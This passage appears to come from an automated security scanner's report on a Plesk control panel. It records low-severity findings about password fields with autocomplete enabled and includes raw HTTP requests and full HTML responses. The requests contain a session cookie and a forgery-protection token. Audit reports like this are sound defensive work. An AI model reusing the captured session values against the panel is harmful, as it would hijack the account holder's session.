</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span>Create User Account</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post">


<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>
<div id='general-vcard-contactName-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="general[vcard][contactName]" id="general-vcard-contactName" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address which is also used as a username for logging in to the Panel&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId">
<option value="5" label="Owner">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User" selected="selected">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-loginString'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-loginString'></span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" autocomplete="off" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>


<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

6.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/create/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /smb/user/create/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:23:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:23:02 GMT
Connection: close
Content-Length: 23631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Create User Account - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/create" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fcreate%2F' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span>Create User Account</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post">


<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>
<div id='general-vcard-contactName-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="general[vcard][contactName]" id="general-vcard-contactName" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address which is also used as a username for logging in to the Panel&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId">
<option value="5" label="Owner">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User" selected="selected">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-loginString'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-loginString'></span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" autocomplete="off" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>


<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

6.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/2  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/2

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /smb/user/edit/id/2 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:23:33 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:23:34 GMT
Connection: close
Content-Length: 45694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Hoyt LLC Research - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
